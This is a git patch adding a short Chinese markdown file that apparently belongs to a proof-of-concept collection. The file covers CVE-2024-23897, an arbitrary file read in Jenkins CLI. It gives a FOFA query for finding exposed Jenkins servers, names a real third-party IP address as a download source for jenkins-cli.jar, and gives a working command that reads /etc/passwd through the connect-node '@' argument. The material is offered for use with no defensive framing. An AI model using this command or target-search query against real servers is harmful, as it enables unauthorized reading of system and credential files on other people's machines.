From 9d97867f57a60fdd08b9726d08035c9cf76694f0 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 26 Jan 2024 20:23:18 +0800 Subject: [PATCH] =?UTF-8?q?Create=20Jenkins=E4=BB=BB=E6=84=8F=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E(CVE-2024-23897).m?= =?UTF-8?q?d?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Jenkins任意文件读取漏洞(CVE-2024-23897).md | 23 ++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 Jenkins任意文件读取漏洞(CVE-2024-23897).md diff --git a/Jenkins任意文件读取漏洞(CVE-2024-23897).md b/Jenkins任意文件读取漏洞(CVE-2024-23897).md new file mode 100644 index 0000000..dfc1975 --- /dev/null +++ b/Jenkins任意文件读取漏洞(CVE-2024-23897).md @@ -0,0 +1,23 @@ +## Jenkins任意文件读取漏洞(CVE-2024-23897) + +Jenkins CLI 是 Jenkins 内置的命令行页面。 + +Jenkins 受影响版本中使用 args4j 库解析CLI命令参数,该库默认将参数中 @ 字符后的文件路径替换为文件内容,攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进制文件) + + +## fofa +``` +app="Jenkins" +``` + +## 根据社区公布的poc: +``` +https://twitter.com/shoucccc/status/1750601321831633026 +``` + +此漏洞需要使用到jenkins-cli.jar。读者可以从任意Jenkins网页地址下载: http://129.146.32.86:8080/jnlpJars/jenkins-cli.jar + +``` +java -jar jenkins-cli.jar -s http://:8080/ connect-node "@/etc/passwd" +``` +![image](https://github.com/wy876/POC/assets/139549762/bba2e17e-472a-4694-b877-c54c3be42a55)